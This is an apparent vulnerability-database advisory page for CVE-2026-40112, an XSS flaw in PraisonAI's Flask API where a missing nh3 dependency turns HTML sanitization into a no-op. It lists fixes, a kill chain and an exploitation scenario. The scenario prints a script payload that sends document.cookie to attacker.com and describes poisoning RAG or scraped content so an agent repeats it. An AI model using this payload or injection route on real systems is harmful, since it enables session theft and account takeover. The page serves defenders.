CVE-2026-40112 — MEDIUM (CVSS 5.4)

Q: Is CVE-2026-40112 actively exploited?

No confirmed active exploitation of CVE-2026-40112 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2026-40112?

1. Patch: Upgrade PraisonAI to 4.5.128 or later—this is the definitive fix. 2. Workaround: Manually install nh3 (pip install nh3) to activate the sanitizer in existing deployments without patching. 3. CSP: Deploy a strict Content-Security-Policy header on any service rendering PraisonAI API output to block inline script execution as defense-in-depth. 4. Input restriction: Audit and restrict which external data sources feed agent RAG pipelines; prefer allow-listed, validated sources over open web crawling. 5. Detection: Monitor Flask API logs and agent output fields for unexpected script tags, event handlers, or javascript: URIs using a WAF or log-based detection rule.

Q: What systems are affected by CVE-2026-40112?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, RAG pipelines, web-facing AI interfaces.

Q: What is the CVSS score for CVE-2026-40112?

CVE-2026-40112 has a CVSS v3.1 base score of 5.4 (MEDIUM). The EPSS exploitation probability is 0.04%.

CISO Take

PraisonAI's Flask API endpoint renders agent-generated HTML without effective sanitization because the nh3 library is not listed as a required dependency, making _sanitize_html silently return raw HTML in every default installation prior to 4.5.128. Any attacker who can influence agent inputs—via RAG data poisoning, web scraping results, or indirect prompt injection—can embed JavaScript payloads that execute in the browser of any user viewing the API output, enabling session theft and account takeover. While the CVSS is 5.4 (medium) and there is no active exploitation or CISA KEV entry, PraisonAI's multi-agent architecture routinely sources inputs from untrusted external content, widening the realistic blast radius significantly beyond a standard XSS. Patch to 4.5.128 immediately; if patching is delayed, manually install nh3 (pip install nh3) to restore sanitization and enforce a strict Content Security Policy on any service rendering API output.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Medium severity (CVSS 5.4) with low attack complexity and no privileges required, though user interaction is needed. The risk is elevated in AI deployments where agent inputs routinely originate from untrusted external sources—RAG databases, web crawlers, scraped third-party content—all common patterns in PraisonAI multi-agent workflows. No public exploit or KEV status lowers urgency, but the insecure-by-default configuration (sanitizer silently disabled) means all default installations are affected. Server-side impact is nil; browser-side impact is session hijack, credential theft, and UI manipulation.

Attack Kill Chain

RAG/Scraping Poisoning

Attacker publishes a webpage or document containing a JavaScript payload designed to be indexed by PraisonAI's RAG pipeline or retrieved by its web scraping agents.

AML.T0070

Indirect Injection

PraisonAI agent processes the poisoned external content and includes the raw JavaScript payload verbatim in its generated output.

AML.T0051.001

No-op Sanitization

Flask API calls _sanitize_html but nh3 is absent in the default install, so the function silently returns the raw HTML with the embedded script intact.

AML.T0049

Browser Execution

Victim user views the API output in a browser; injected JavaScript executes immediately, enabling session token theft, credential harvesting, or further UI-based manipulation.

AML.T0048.003

RAG/Scraping Poisoning

Attacker publishes a webpage or document containing a JavaScript payload designed to be indexed by PraisonAI's RAG pipeline or retrieved by its web scraping agents.

AML.T0070

Indirect Injection

PraisonAI agent processes the poisoned external content and includes the raw JavaScript payload verbatim in its generated output.

AML.T0051.001

No-op Sanitization

Flask API calls _sanitize_html but nh3 is absent in the default install, so the function silently returns the raw HTML with the embedded script intact.

AML.T0049

Browser Execution

Victim user views the API output in a browser; injected JavaScript executes immediately, enabling session token theft, credential harvesting, or further UI-based manipulation.

AML.T0048.003

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
PraisonAI	pip	< 4.5.128	`4.5.128`
1 dependents 84% patched ~0d to patch Full package profile →
praisonai	pip	—	No patch
1 dependents 84% patched ~0d to patch Full package profile →

Severity & Risk

CVSS 3.1

5.4 / 10

EPSS

0.0%

chance of exploitation in 30 days

Higher than 11% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI Required

S Unchanged

C Low

I Low

A None

What should I do?

5 steps

Patch: Upgrade PraisonAI to 4.5.128 or later—this is the definitive fix.
Workaround: Manually install nh3 (pip install nh3) to activate the sanitizer in existing deployments without patching.
CSP

Deploy a strict Content-Security-Policy header on any service rendering PraisonAI API output to block inline script execution as defense-in-depth.
Input restriction: Audit and restrict which external data sources feed agent RAG pipelines; prefer allow-listed, validated sources over open web crawling.
Detection: Monitor Flask API logs and agent output fields for unexpected script tags, event handlers, or javascript: URIs using a WAF or log-based detection rule.

CISA SSVC Assessment

Decision Track*

Exploitation poc

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Prompt Injection Code Execution Data Extraction Agent Framework RAG AML.T0049 - Exploit Public-Facing Application AML.T0051.001 - Indirect AML.T0070 - RAG Poisoning AML.T0080 - AI Agent Context Poisoning

Compliance Impact

This CVE is relevant to:

ISO 42001

8.4 - AI system operation and monitoring

NIST AI RMF

MANAGE-2.2 - AI risk treatment plans

OWASP LLM Top 10

LLM01 - Prompt Injection LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2026-40112?

PraisonAI's Flask API endpoint renders agent-generated HTML without effective sanitization because the nh3 library is not listed as a required dependency, making _sanitize_html silently return raw HTML in every default installation prior to 4.5.128. Any attacker who can influence agent inputs—via RAG data poisoning, web scraping results, or indirect prompt injection—can embed JavaScript payloads that execute in the browser of any user viewing the API output, enabling session theft and account takeover. While the CVSS is 5.4 (medium) and there is no active exploitation or CISA KEV entry, PraisonAI's multi-agent architecture routinely sources inputs from untrusted external content, widening the realistic blast radius significantly beyond a standard XSS. Patch to 4.5.128 immediately; if patching is delayed, manually install nh3 (pip install nh3) to restore sanitization and enforce a strict Content Security Policy on any service rendering API output.

Is CVE-2026-40112 actively exploited?

No confirmed active exploitation of CVE-2026-40112 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-40112?

1. Patch: Upgrade PraisonAI to 4.5.128 or later—this is the definitive fix. 2. Workaround: Manually install nh3 (pip install nh3) to activate the sanitizer in existing deployments without patching. 3. CSP: Deploy a strict Content-Security-Policy header on any service rendering PraisonAI API output to block inline script execution as defense-in-depth. 4. Input restriction: Audit and restrict which external data sources feed agent RAG pipelines; prefer allow-listed, validated sources over open web crawling. 5. Detection: Monitor Flask API logs and agent output fields for unexpected script tags, event handlers, or javascript: URIs using a WAF or log-based detection rule.

What systems are affected by CVE-2026-40112?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, RAG pipelines, web-facing AI interfaces.

What is the CVSS score for CVE-2026-40112?

CVE-2026-40112 has a CVSS v3.1 base score of 5.4 (MEDIUM). The EPSS exploitation probability is 0.04%.

AI Security Impact

Affected AI Architectures

agent frameworksRAG pipelinesweb-facing AI interfaces

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application

AML.T0051.001 Indirect

AML.T0070 RAG Poisoning

AML.T0080 AI Agent Context Poisoning

Compliance Controls Affected

ISO 42001: 8.4

NIST AI RMF: MANAGE-2.2

OWASP LLM Top 10: LLM01, LLM02

Technical Details

Original Advisory

PraisonAI is a multi-agent teams system. Prior to 4.5.128, the Flask API endpoint in src/praisonai/api.py renders agent output as HTML without effective sanitization. The _sanitize_html function relies on the nh3 library, which is not listed as a required or optional dependency in pyproject.toml. When nh3 is absent (the default installation), the sanitizer is a no-op that returns HTML unchanged. An attacker who can influence agent input (via RAG data poisoning, web scraping results, or prompt injection) can inject arbitrary JavaScript that executes in the browser of anyone viewing the API output. This vulnerability is fixed in 4.5.128.

Exploitation Scenario

An attacker identifies a PraisonAI deployment that uses a RAG pipeline ingesting content from publicly accessible websites. They publish a page containing <script>fetch('https://attacker.com/c?s='+document.cookie)</script> embedded within otherwise legitimate-looking security advisory text. A PraisonAI agent performing routine threat research crawls this page and incorporates the content verbatim into its output. The Flask API calls _sanitize_html, but because nh3 is absent in the default install, the function returns the raw HTML unchanged. When an analyst views the agent output in their browser, the script executes immediately, exfiltrating their session cookie. The attacker uses the stolen session to access the PraisonAI operator console and pivot to further intelligence collection or agent manipulation.